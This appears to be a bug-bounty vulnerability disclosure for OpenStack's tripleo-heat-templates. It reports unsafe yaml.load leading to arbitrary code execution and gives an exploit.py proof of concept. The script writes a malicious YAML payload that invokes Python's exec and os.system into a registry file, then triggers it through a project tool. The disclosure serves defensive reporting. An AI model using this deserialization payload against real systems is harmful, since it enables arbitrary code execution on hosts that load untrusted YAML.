tripleo-heat-templates

vulnerability arbitrary code execution

severity 3.8

language python

registry other

repo openstack/tripleo-heat-templates

fork 418sec/tripleo-heat-templates

Description

Heat templates for deploying OpenStack. Mirror of code maintained at opendev.org.

Vulnerability discription untrusded loading of data by the yaml.load function leading to Arbitrary code execution.

Proof of Concept

run exploit.py

# exploit.py
import os
os.system('git clone https://github.com/openstack/tripleo-heat-templates.git')
os.chdir('tripleo-heat-templates/tools/')
exp = """!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""
open('overcloud-resource-registry-puppet.yaml','w+').write(exp)
os.system('''python render-ansible-tasks.py --output ./ --ansible-tasks ./ --roles-list sdfsd''')

References

Permalink #1